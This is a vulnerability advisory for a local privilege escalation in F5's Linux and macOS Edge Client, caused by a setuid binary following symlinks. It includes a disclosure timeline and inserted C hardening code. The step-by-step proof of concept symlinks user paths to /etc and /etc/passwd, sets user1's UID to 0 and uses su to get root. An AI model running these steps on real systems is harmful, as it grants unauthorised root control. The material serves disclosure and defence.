Title: F5 BIG-IP APM client for Linux and macOS vulnerability
Author: Rich Mirch
CVE: CVE-2018-5529 (incomplete fix), CVE-2018-5546
Vendor Advisory: https://support.f5.com/csp/article/K52171282 (CVE-2018-5529)
https://support.f5.com/csp/article/K54431371 (CVE-2018-5546)
Description
The svpn_x86_64 binary included in the F5 Linux CLI Edge Client package
changes the ownership and permissions of several files and directories
under $HOME/.F5Networks which allows local unprivileged users to obtain
ownership of arbitrary files via vectors involving creation of a directory
and a file under that directory, and later replacing that directory or
file with a symlink.
Notes:
1. The PoC is provided for Linux; however, macOS is also vulnerable. The svpn
binary is named differently and stored in a different directory on macOS.
2. The policyserver component is also vulnerable to a similar attack against
the $HOME/Library/Logs/F5Networks/policyserver.log file on macOS.
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C
Base: 7.8
Temporal: 7.0
Test Environment
OS: CentOS 64-bit release 6.9 (latest patches as of 2018-04-12)
Kernel: 2.6.32-696.23.1.el6.x86_64
ISO: apmclients-7160.2018.118.2335-4172.0.iso
Proof Of Concept
Two distinct arbitrary file takeover vulnerabilities exist in the
/usr/local/lib/F5Networks/SSLVPN/svpn_x86_64 binary which is setuid root.
1. Privileges are not dropped prior to chown()/chmod() of the
$HOME/.F5Networks directory.
2. Privileges are not dropped prior to chown()/chmod() of the
$HOME/.F5Networks/svpn.log file.
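Both root causes above are the same mistake: a setuid-root process calls chown()/chmod() on a path under a user-controlled directory, and the kernel resolves any symlink in that path on root's behalf. The following is an added example, not code from the advisory or from F5, showing the two defences a setuid program can apply before touching $HOME/.F5Networks or svpn.log: drop effective privileges to the real user for that step, and operate on an O_NOFOLLOW-opened descriptor that has been checked with fstat() instead of on the path. The function names, the temp-directory self-check and the EINVAL/EMLINK error choices are this example's own.

```c
/* Added example (not the advisory's or F5's code): hardening the
 * chown()/chmod() step of a setuid-root client so that a symlink placed
 * under $HOME cannot redirect it to /etc or /etc/passwd. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Defence 1: give up root for the duration of the $HOME manipulation.
 * Returns 0 on success, -1 with errno set. A no-op when not setuid. */
int drop_to_real_user(void)
{
    if (setegid(getgid()) != 0) return -1;
    if (seteuid(getuid()) != 0) return -1;
    return 0;
}

/* Defence 2: adjust ownership/mode of `path` only after proving what it is.
 * - O_NOFOLLOW refuses a symlink as the final component (errno ELOOP)
 * - fstat() on the descriptor describes the object we actually opened
 * - the object must be the expected type (EINVAL otherwise), a single-link
 *   regular file (EMLINK if it has been hard-linked elsewhere), and owned by
 *   the target user or by the program itself (EPERM otherwise)
 * - fchown()/fchmod() then act on that same descriptor, never on the path.
 * Returns 0 on success, -1 with errno set. */
int fix_user_file_perms(const char *path, uid_t uid, gid_t gid, mode_t mode,
                        int want_dir)
{
    int flags = O_RDONLY | O_NOFOLLOW | O_CLOEXEC;
    if (want_dir) flags |= O_DIRECTORY;
    int fd = open(path, flags);
    if (fd < 0) return -1;                       /* ELOOP for a symlink */

    struct stat st;
    if (fstat(fd, &st) != 0) { close(fd); return -1; }
    int right_type = want_dir ? S_ISDIR(st.st_mode) : S_ISREG(st.st_mode);
    if (!right_type) { close(fd); errno = EINVAL; return -1; }
    if (!want_dir && st.st_nlink != 1) { close(fd); errno = EMLINK; return -1; }
    if (st.st_uid != uid && st.st_uid != geteuid()) {
        close(fd); errno = EPERM; return -1;
    }
    if (fchown(fd, uid, gid) != 0 || fchmod(fd, mode) != 0) {
        int saved = errno; close(fd); errno = saved; return -1;
    }
    close(fd);
    return 0;
}

/* Constructed scenario in a temp directory standing in for $HOME/.F5Networks:
 * a real svpn.log, and a symlink that plays the role of
 * svpn.log -> /etc/passwd from the advisory. Returns 0 if both defences
 * behave as intended, otherwise a small code naming the failed check. */
int self_check(void)
{
    char dir[] = "/tmp/f5perm-XXXXXX";
    char file[256], link[256];
    int rc = 0;
    if (mkdtemp(dir) == NULL) return 1;
    snprintf(file, sizeof file, "%s/svpn.log", dir);
    snprintf(link, sizeof link, "%s/svpn.link", dir);
    int fd = open(file, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) rc = 2; else close(fd);
    if (rc == 0 && symlink(file, link) != 0) rc = 3;
    if (rc == 0 && drop_to_real_user() != 0) rc = 4;
    /* the symlink must be refused, not followed */
    if (rc == 0 && !(fix_user_file_perms(link, getuid(), getgid(), 0600, 0) == -1
                     && errno == ELOOP)) rc = 5;
    /* the genuine file owned by the user is accepted */
    if (rc == 0 && fix_user_file_perms(file, getuid(), getgid(), 0600, 0) != 0) rc = 6;
    /* a directory presented where a file is expected is refused */
    if (rc == 0 && !(fix_user_file_perms(dir, getuid(), getgid(), 0700, 0) == -1
                     && errno == EINVAL)) rc = 7;
    /* the directory handled as a directory is accepted */
    if (rc == 0 && fix_user_file_perms(dir, getuid(), getgid(), 0700, 1) != 0) rc = 8;
    unlink(link); unlink(file); rmdir(dir);
    return rc;
}

int main(void)
{
    int rc = self_check();
    printf("self-check %s (code %d)\n", rc == 0 ? "passed" : "FAILED", rc);
    return rc;
}
```

The self-check runs unprivileged: chown to one's own uid/gid is permitted, so the symlink rejection and the descriptor-based change can be exercised without a setuid build. In a real setuid binary, defence 1 on its own would already have stopped test case 1, because an unprivileged chown() of /etc fails with EPERM; defence 2 closes the remaining gap when the program must keep root for the step (for example to hand a root-created log file over to the user).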
Note: A low privileged account named user1 is used for all test cases.
[user1@localhost ~]$ id
uid=500(user1) gid=500(user1) groups=500(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
################################################################################
# Test case 1 - take ownership of a directory
# /etc via $HOME/.F5Networks
################################################################################
[Step 1] Create a symlink from /etc to $HOME/.F5Networks
[user1@localhost ~]$ ln -s /etc /home/user1/.F5Networks
[user1@localhost ~]$ ls -ld /etc /home/user1/.F5Networks
drwxr-xr-x. 64 root root 4096 Apr 12 19:29 /etc
lrwxrwxrwx. 1 user1 user1 4 Apr 12 19:38 /home/user1/.F5Networks -> /etc
[Step 2] Execute /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
[user1@localhost ~]$ /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
[Step 3] Show that user1 is now the owner of /etc.
[user1@localhost ~]$ ls -ld /etc
drwxr-xr-x. 64 user1 user1 4096 Apr 12 19:39 /etc
[Step 4] Modify /etc/passwd and change UID/GID to 0 for user1.
[user1@localhost ~]$ cd /etc
[user1@localhost etc]$ mv passwd passwd.old
[user1@localhost etc]$ cp passwd.old passwd
[user1@localhost etc]$ ls -ld /etc/passwd
-rw-r--r--. 1 user1 user1 929 Apr 12 19:40 /etc/passwd
[user1@localhost etc]$ sed -i.orig -e 's/:500:500/:0:0/' /etc/passwd
[user1@localhost etc]$ diff -u /etc/passwd.orig /etc/passwd
--- /etc/passwd.orig 2018-04-12 19:40:02.132987696 -0500
+++ /etc/passwd 2018-04-12 19:41:15.484988778 -0500
@@ -18,4 +18,4 @@
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
-user1:x:500:500::/home/user1:/bin/bash
+user1:x:0:0::/home/user1:/bin/bash
[Step 5] Execute /bin/su - user1 and become root.
[user1@localhost etc]$ /bin/su - user1
Password:
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
################################################################################
# Test case 2 - take ownership of a file
# /etc/passwd via $HOME/.F5Networks/svpn.log
################################################################################
[Step 1] Create $HOME/.F5Networks.
[user1@localhost ~]$ mkdir -m 755 /home/user1/.F5Networks
[Step 2] Display permissions of /etc/passwd and attempt to write to it.
[user1@localhost ~]$ ls -ld /etc /etc/passwd
drwxr-xr-x. 64 root root 4096 Apr 12 19:41 /etc
-rw-r--r--. 1 root root 929 Apr 12 19:40 /etc/passwd
[user1@localhost ~]$ echo test> /etc/passwd
-bash: /etc/passwd: Permission denied
[user1@localhost ~]$
[Step 3] Create a symlink from /etc/passwd to /home/user1/.F5Networks/svpn.log.
[user1@localhost ~]$ ln -s /etc/passwd /home/user1/.F5Networks/svpn.log
[user1@localhost ~]$ ls -ld .F5Networks/svpn.log /etc/passwd
-rw-r--r--. 1 root root 929 Apr 12 19:40 /etc/passwd
lrwxrwxrwx. 1 user1 user1 11 Apr 12 22:02 .F5Networks/svpn.log -> /etc/passwd
[Step 4] Backup /etc/passwd.
[user1@localhost ~]$ cp -p /etc/passwd passwd.orig
[Step 5] Display contents of /etc/passwd.
[user1@localhost ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
user1:x:500:500::/home/user1:/bin/bash
[Step 6] Execute /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64. user1 is
now the owner of /etc/passwd.
[user1@localhost ~]$ /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
[user1@localhost ~]$ ls -ld /etc/passwd
-rw-r--r--. 1 user1 user1 2385 Apr 12 22:14 /etc/passwd
[Step 7] Display contents of /etc/passwd. Notice that svpn's log output has been appended to the file.
[user1@localhost ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
user1:x:500:500::/home/user1:/bin/bash
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, =====================================
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Location: /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Version: "7160.2018.0118.1"
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Locale: C
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, =====================================
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,
2018-04-12,22:14:15:121, 2479,2479,svpn, 48,,,, current log level = 63
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 91, ------------------,
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 92, [main], getuid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 93, [main], getgid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 94, [main], geteuid, 0
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 95, [main], getegid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 96, [main], HOME, /home/user1
2018-04-12,22:14:15:121, 2479,2479,svpn, 48, , 98, [main], version, 7160.2018.0118.1
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 100, ------------------,
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 107, [main], Current sigprocmask: 0xffff8a00
2018-04-12,22:14:17:124, 2479,2479,svpn, 1, , 33, ReadProperties(), reading of initial configuration timed out
2018-04-12,22:14:17:124, 2479,2479,svpn, 1, , 116, [main], Reading settings property failed
[Step 8] Create a new /etc/passwd file and change UID and GID to 0.
[user1@localhost ~]$ sed -e 's/:500:500/:0:0/' < passwd.orig > /etc/passwd
[Step 9] Execute /bin/su - user1 and become root.
[user1@localhost ~]$ su - user1
Password:
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@localhost ~]#
Timeline:
2018-04-16: Reported to vendor
2018-04-18: Vendor confirmed PoC. Sent to F5 PD for further review
2018-04-25: Vendor confirmed vulnerability and requested embargo
2018-07-12: Vendor released fix in 7.1.7 and advisory K52171282. CVE-2018-5529
2018-07-17: Notified vendor that the fix in 7.1.7 did not properly resolve the issue
2018-07-17: Vendor acknowledged receipt of the incomplete fix report
2018-07-17: Vendor confirmed vulnerability
2018-08-16: Vendor released fix in 7.1.7.1 and advisory K54431371. CVE-2018-5546